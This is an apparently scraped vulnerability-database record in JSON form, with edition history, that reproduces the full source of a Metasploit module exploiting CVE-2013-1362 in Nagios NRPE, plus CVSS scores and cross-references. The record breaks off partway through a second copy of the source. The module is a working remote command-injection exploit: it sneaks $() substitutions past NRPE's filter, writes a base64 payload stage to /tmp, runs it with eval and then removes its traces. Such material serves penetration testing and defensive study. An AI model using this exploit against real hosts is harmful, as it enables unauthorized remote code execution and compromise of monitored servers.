"https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 
'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f 
/tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-07-29T13:09:56", "differentElements": 
["sourceData"], "edition": 107}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "7af0909609ddf9c8e970b9a830af05bd", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.\n", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1362", "http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability"], "cvelist": ["CVE-2013-1362"], "lastseen": "2019-08-02T15:00:56", "history": [], "viewCount": 127, "enchantments": {"score": {"value": 8.4, "vector": "NONE", "modified": "2019-08-02T15:00:56"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2013-1362"]}, {"type": "amazon", "idList": ["ALAS-2013-203"]}, {"type": "exploitdb", "idList": ["EDB-ID:24955"]}, {"type": "suse", "idList": ["SUSE-SU-2013:1219-1", "OPENSUSE-SU-2013:0624-1", "OPENSUSE-SU-2013:0621-1"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:121287", "PACKETSTORM:120507"]}, {"type": "zdt", "idList": ["1337DAY-ID-20645"]}, {"type": "nessus", "idList": ["FEDORA_2013-9848.NASL", "FEDORA_2013-9829.NASL", "FEDORA_2013-9836.NASL", "SUSE_11_NAGIOS-NRPE-130710.NASL", "ALA_ALAS-2013-203.NASL", "OPENSUSE-2013-301.NASL", "NAGIOS_NRPE_2_14.NASL", "GENTOO_GLSA-201408-18.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:865756", "OPENVAS:1361412562310850457", 
"OPENVAS:1361412562310120026", "OPENVAS:1361412562310850460", "OPENVAS:865802", "OPENVAS:1361412562310865802", "OPENVAS:850460", "OPENVAS:850457", "OPENVAS:1361412562310865756", "OPENVAS:1361412562310121262"]}, {"type": "saint", "idList": ["SAINT:191B282062BFEBFDC0EBFA60A2FDED78", "SAINT:E0F846270087DB671556237BDF17DDDE", "SAINT:21BB3E24EB9AE6BD8636B7F5A2A455A3"]}, {"type": "gentoo", "idList": ["GLSA-201408-18"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:12910"]}], "modified": "2019-08-02T15:00:56"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-08-02T15:00:56", "differentElements": ["sourceData"], "edition": 108}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "b8fd29a158b5b91d5ab7a065082cbc04", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. 
When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.\n", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1362", "http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability"], "cvelist": ["CVE-2013-1362"], "lastseen": "2019-08-02T16:54:26", "history": [], "viewCount": 127, "enchantments": {"score": {"value": 8.7, "vector": "NONE", "modified": "2019-08-02T16:54:26"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2013-1362"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2013:0624-1", "SUSE-SU-2013:1219-1", "OPENSUSE-SU-2013:0621-1"]}, {"type": "nessus", "idList": ["FEDORA_2013-9829.NASL", "FEDORA_2013-9848.NASL", "NAGIOS_NRPE_2_14.NASL", "ALA_ALAS-2013-203.NASL", "OPENSUSE-2013-301.NASL", "SUSE_11_NAGIOS-NRPE-130710.NASL", "FEDORA_2013-9836.NASL", "GENTOO_GLSA-201408-18.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:120507", "PACKETSTORM:121287"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310120026", "OPENVAS:1361412562310850460", "OPENVAS:865802", "OPENVAS:1361412562310850457", "OPENVAS:865756", "OPENVAS:850460", "OPENVAS:850457", "OPENVAS:1361412562310865756", "OPENVAS:1361412562310865802", "OPENVAS:1361412562310121262"]}, {"type": "zdt", "idList": ["1337DAY-ID-20645"]}, {"type": "amazon", "idList": ["ALAS-2013-203"]}, {"type": "exploitdb", "idList": ["EDB-ID:24955"]}, {"type": "saint", "idList": ["SAINT:E0F846270087DB671556237BDF17DDDE", "SAINT:191B282062BFEBFDC0EBFA60A2FDED78", "SAINT:21BB3E24EB9AE6BD8636B7F5A2A455A3"]}, {"type": "gentoo", "idList": ["GLSA-201408-18"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:12910"]}], "modified": "2019-08-02T16:54:26"}}, "objectVersion": "1.4", "sourceHref": 
"https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which